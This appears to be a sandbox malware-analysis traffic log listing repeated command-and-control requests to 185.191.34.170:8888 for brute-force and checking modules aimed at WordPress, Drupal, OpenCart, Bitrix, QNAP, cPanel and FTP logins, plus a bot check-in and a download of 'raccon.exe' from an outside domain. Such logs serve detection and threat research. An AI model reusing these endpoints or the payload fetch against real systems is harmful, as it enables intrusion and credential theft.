Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/knock?worker=Universal&os=Windows&version=3.13 HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/chkVersion?currVers=3.13&arch=win HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
